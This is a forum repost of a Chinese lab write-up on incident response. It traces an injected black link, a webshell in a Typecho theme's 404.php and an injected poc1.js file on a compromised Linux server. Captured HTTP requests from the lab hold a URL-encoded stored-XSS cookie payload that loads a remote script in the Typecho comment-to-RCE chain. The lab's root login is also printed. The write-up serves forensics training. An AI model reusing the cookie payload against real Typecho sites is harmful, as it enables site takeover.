ToB企服应用市场:ToB评测及商务社交产业平台

标题: 玄机——第五章 linux实战-黑链 wp [打印本页]

作者: 耶耶耶耶耶    时间: 2024-7-15 04:45
标题: 玄机——第五章 linux实战-黑链 wp
一、前言

题目链接:第五章 linux实战-黑链
三连私信免费送玄机注册约请码私信!!!看见就回!!留意私信!!
首先简朴了解一下什么是黑链;
官方一点就是在网络安全领域,“黑链”(Black Hat SEO Links)是指通过不合法手段在网站上添加的链接,这些链接通常指向不良内容或恶意网站,目的是进步这些网站的搜索引擎排名或传播恶意软件。这种行为违背了搜索引擎的服务条款,也会对受影响的网站造成负面影响,包括搜索引擎惩罚和用户流失。
黑链的特征
总结来说,黑链是一种通过不合法手段在网站上植入的链接,旨在提升恶意网站的搜索引擎排名或传播恶意软件。
实战案例
在实际操作中,黑链通常通过以下方式植入:

例子
  1. <!-- 正常链接 -->
  2. <a href="http://legit-site.com">Legit Site</a>
  3. <!-- 黑链 -->
  4. <a href="http://malicious-site.com" style="display:none;">Hidden Link</a>
复制代码
二、概览

简介

服务器场景操作体系 Linux
服务器账号密码 root xjty110pora 端口 2222
任务情况阐明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急相应工程师小王或人收到安全装备告警服务器被植入恶意文件,请上机排查
开放题目
毛病修复
参考

1、找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}
2、webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}
3、黑客注入黑链文件的 md5 md5sum file flag{md5}
4、攻击入口是哪里?url哀求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}
三、参考文章

玄机应急相应wp
四、步骤(解析)

准备步骤#1.0

利用Xshell毗连,新建或者利用SSH都可,留意靶机端口号;(具体操作不再多述)
留意:如是“校园网”毗连的,出口流量大概会受到限定,建议更换“手机热门”;
新建毗连;

成功毗连;

步骤#1.1

找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

解题思绪
题目让我们提交黑链地点文件中的文件名,那我们有访问服务器的权限,就可以手动检查网站的HTML和PHP文件,探求可疑的代码片段,或者检查特定的文件夹,某些文件夹更容易被黑客攻击,常见的如 /var/www/html,/tmp,/uploads,/images 等,再不行的话,由于靶机是在Linux服务器上,所以我们可以利用命令行工具进行全面搜索;
查找文件中包含“黑链”的内容;
  1. grep -rnw '/var/www/html/' -e '黑链'
复制代码
得到;

简朴分析一下;

那有的师傅大概就要问了,为什么你就知道是“/var/www/html/”这个目录?
由于在很多应急中,这些文件夹更容易被黑客攻击,常见的如 /var/www/html,/tmp,/uploads,/images 等,简朴来说就是一个个排查已往的,也并不是一开始就直接查目录“var/www/html”的;
那有的师傅又有疑问了,为什么你就知道搜索关键字“黑链”呢?
实在吧,简朴来说就是“黑链”是指在网页上暗中加入的恶意链接,这些链接通常会引导用户访问恶意网站、进行垂纶攻击或传播恶意软件。黑链大概不会直接利用“黑链”这个关键词,而是大概通过其他方式隐蔽和伪装。然而,在一些案例中,攻击者大概会在源代码中留下特定的标志或注释以便自己辨识和管理这些黑链。
为什么查找关键词“黑链”?
但是实际情况是;
在实际情况中,黑链通常不会直接标志为“黑链”。它们大概会隐蔽在平凡的链接或其他代码中。以下是一些更常见的黑链隐蔽方式:
那如果通常我们该如何有用地查找黑链呢?
由于黑链大概以多种方式隐蔽,以下是一些更有用的查找方法:
总结;
我们固然直接查找关键词“黑链”发现一些攻击者留下的标志,但这种方法的成功率较低。(大概实战里很少出现这种情况)更有用的方法是通过体系性扫描和分析,结合人工查察来检测和清理黑链。分析全部链接和代码中的可疑部门是识别黑链的关键。
题目让我们提交黑链地点的文件;
所以;
  1. flag{header.php}
复制代码
当然这题也远不止这一种解法,刚刚上面也有说过,可以利用D盾进行扫描出“黑链”,那我们这里就可以尝试一下到底行不行;
这里我直接利用"Xftp"毗连靶机,导出源码(/var/www/html),老规矩,新建毗连,留意“校园网”换成“手机热门”即可,以防毗连不上;
Xftp毗连成功,开始传输"/var/www/html";

导出完成,开始利用"D盾"开始扫描;
得到;

固然确实没有扫出来,但是我看了其它师傅的wp,发现导出源码可以另外一种方法进行查找;
这里我利用的是“vscode”,这就是一个我常常写js前端的,接着将我们源码文件“html"导入到“vscode”的工作区(不必要工作区也行,导入进行即可);
得到;

接着,选中文件“html”选择“在文件中查找”,输入“黑链”也是可以定位到的;

最后;

这里我举的例子是“vscode”,当然肯定不止“vscode”可以做到这样,雷同的还有很多,方法不唯一,仅供参考;
步骤#1.2

webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

解题思绪
题目让我们提交webshell的具体路径,那就是查杀webshell呗,当然这里也可以手工查杀同样也是可以工具进行查杀,那当然这里没有限定我们肯定是怎么方便怎么来对吧而且源码我们也导出来了(var/www/html),要说工具中,我肯定最喜欢的就是“D盾”,由于便捷实用嘛,话不多说,直接把文件“html”丢进“D盾”进行查杀(实在题一已经做过一遍了,但是怕有新来的师傅不明白,所以还再演示一遍最好);
这里手工查杀webshell就不再多演示了,详细请看:应急相应-webshell查杀
由于题一源码已导出“var/www/html”,这里不再多叙;
利用D盾进行查杀;

扫出来三个,一个一个跟进分析即可,最后是在文件“404.php”里面发现了webshell;
右键记事本打开;

简朴分析一下,为什么就可以确定这个是webshell呢?

重复:这些语句被重复了多次,大概是为了增加成功实行的概率或者增加代码的混淆性。
正常代码:文件中还包含了正常的 PHP 代码,如 phpinfo() 和一些模板代码。这种混杂的方式使得恶意代码不易被发现。
模板代码
  1. <?php if (!defined('__TYPECHO_ROOT_DIR__')) exit; ?>
  2. <?php $this->need('header.php'); ?>
  3. <div class="col-mb-12 col-tb-8 col-tb-offset-2">
  4.     <div class="error-page">
  5.         <h2 class="post-title">404 - <?php _e('页面没找到'); ?></h2>
  6.         <p><?php _e('你想查看的页面已被转移或删除了, 要不要搜索看看: '); ?></p>
  7.         <form method="post">
  8.             <p><input type="text" name="s" class="text" autofocus/></p>
  9.             <p>
  10.                 <button type="submit" class="submit"><?php _e('搜索'); ?></button>
  11.             </p>
  12.         </form>
  13.     </div>
  14. </div><!-- end #content-->
  15. <?php $this->need('footer.php'); ?>
复制代码
这些代码看起来是正常的模板代码,负责显示一个 404 错误页面。但是它们与恶意代码混杂在一起。
最后总结;
这些特点共同表明这个文件包含恶意代码,而且具备 webshell 的特征,使攻击者能够远程实行任意代码,控制服务器。
题目让我们提交webshell的具体路径;
至此;
  1. flag{/var/www/html/usr/themes/default/404.php}
复制代码
步骤#1.3

黑客注入黑链文件的 md5 md5sum file flag{md5}

解题思绪
题目让我们提交黑客注入的黑链文件的MD5,一样平常黑客注入黑链文件,常见的有;






这里我们就可以重点排查这类的危险文件,但是我发现题二查杀webshell的时候也出现了一个".js"的文件,我们可以先从这里下手,由于毕竟是"D盾"查杀的嘛,分析也要分析完整;
得到;

跟进分析,右键记事本打开进行查察;
得到;

简朴分析一下;


调用 insertIframe 函数:在页面加载时实行,插入 iframe 并触发写入恶意代码的操作。
最后总结;

这里任意拿出一条足以确认文件有大题目它有那么多,那肯定就不言而喻咯;
综上所述;
   这段代码通过插入一个隐蔽的 iframe 并利用 iframe 内部的表单来向网站模板文件注入恶意 PHP 代码,然后自动生存。这是一种范例的黑链注入手法,目的是在受感染的网站中嵌入恶意代码,从而控制服务器或窃取数据。通过分析代码的功能和意图,可以确定其恶意性子。
  题目让我们提交文件的MD5,为了便捷些嘛,由于这里我们已经导出了源码(var/www/html)所以我们可以直接利用windows自带的文件MD5加密;
1.找到“poc1.js”当前目录,鼠标右键“在终端中打开”或者在“html”路径栏,直接cmd回车即可打开;(打开方法不唯一,仅供参考)
2.输入certutil -hashfile <文件名称> MD5,回车后,即可校验文件的MD5了(留意写绝对路径)
鼠标右键打开终端;

输入“cmd”回车进入终端;

输入命令;
  1. certutil -hashfile .\poc1.js MD5
复制代码
最后得到;

至此;
  1. flag{10c18029294fdec7b6ddab76d9367c14}
复制代码
当然也可以直接在靶机上直接输入命令;(留意同样进入到文件当前目录)
  1. md5sum poc1.js
复制代码
也是可以得到;(可以说一个是windows自带的,一个是Liunx自带的);

步骤#1.4

攻击入口是哪里?url哀求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}

解题思绪
题目让我们提交攻击入口的URL哀求路径,那这里要分析一个潜伏的攻击入口和确定黑链植入的 URL 哀求路径,我们必要通过分析网络流量捕捉文件(pcap 文件)来找出可疑的 HTTP 哀求和相应,那这里返回靶机的根目录刚好就发现了一个“output.pcap”流量包,那就不必要多想了,肯定是为我们准备的,直接导出丢进“Wireshark”分析即可(不知道咋压缩导出的,那我们可以直接利用Xftp进行毗连传输导出即可)
发现流量包“output.pcap”,利用Xftp导出进行分析;(实在/var/www/html目录下也发现了,output.pcap流量包,对比了一下发现两个都是一样的)

丢进“Wireshark”进行分析;

在 Wireshark 的过滤器中输入 http 以过滤出全部 HTTP 哀求和相应。这将使我们能够专注于与 Web 流量相关的数据包,当然这里也可以直接尝试定位文件“poc1.js”,由于题三我们已经找到了黑客注入的文件是“poc1.js”,所以我们可以尝试查找一下相关的数据包;
利用命令;
  1. http contains "poc1.js"
复制代码
查找数据包带有关键字符串“poc1.js”
得到;

我个人比较喜欢数据包从大到小进行分析,当然这里也是一样;
那我们右键追踪http进行分析;
得到;

简朴分析一下;
哀求内容;
  1. GET /poc.js HTTP/1.1
  2. Host: 192.168.20.130
  3. Connection: keep-alive
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Cookie: 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_author=haha; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_mail=haha%40haha.com; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
  10. If-None-Match: W/"657971d7-817"
  11. If-Modified-Since: Wed, 13 Dec 2023 08:56:55 GMT
  12. Accept-Encoding: gzip, deflate
复制代码
哀求分析
相应分析(这里js太长了,就不单独放了)

最后总结;

刚刚没留意,突然发现下面有一个反弹的“poc1.js“;

右键追踪http,简朴分析一下;
这个HTTP哀求中包含了一个名为poc1.js的文件,这个文件是通过注入到Cookie中的JavaScript代码引入的。
哀求与相应分析
HTTP哀求
  1. GET /index.php/archives/1/ HTTP/1.1
  2. Host: 192.168.20.130
  3. Connection: keep-alive
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  8. Referer: http://192.168.20.130/index.php/archives/1/
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_author=haha; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_mail=haha%40haha.com; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
  11. Accept-Encoding: gzip, deflate
复制代码
HTTP相应
  1. HTTP/1.1 200 OK
  2. Server: nginx
  3. Date: Wed, 13 Dec 2023 10:00:07 GMT
  4. Content-Type: text/html; charset=UTF-8
  5. Transfer-Encoding: chunked
  6. Connection: keep-alive
  7. Vary: Accept-Encoding
  8. X-Pingback: http://192.168.20.130/index.php/action/xmlrpc
  9. Content-Encoding: gzip
复制代码
关键点分析
1、Cookie注入的代码
  1. 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
复制代码
URL解码得到;(这里我直接解码得出)
URL在线解码
得到;

实在这是一个毛病;(更多信息请大家自行查察链接,这里不再进行夸大)
具体:Typecho1.2 - 1.2.1-rc前台批评存储xss到rce 毛病复现-分析-修复
所以这段Cookie中包含了一段恶意的JavaScript代码注入:<script src="http://192.168.20.130/poc1.js"></script>

确定反弹的“poc1.js”原因;

最后总结;
   哀求和相应中包含的信息表明http://192.168.20.130/index.php/archives/1/页面是黑链攻击的入口,通过Cookie注入的JavaScript代码引入了poc1.js文件,从而实行了恶意操作。这个URL是反弹的“poc1.js”的原因在于其作为恶意代码的载体和入口。
  题目让我们提交攻击入口的URL哀求路径;
URL哀求路径:http://192.168.20.130/index.php/archives/1/
至此;
  1. flag{/index.php/archives/1/}
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4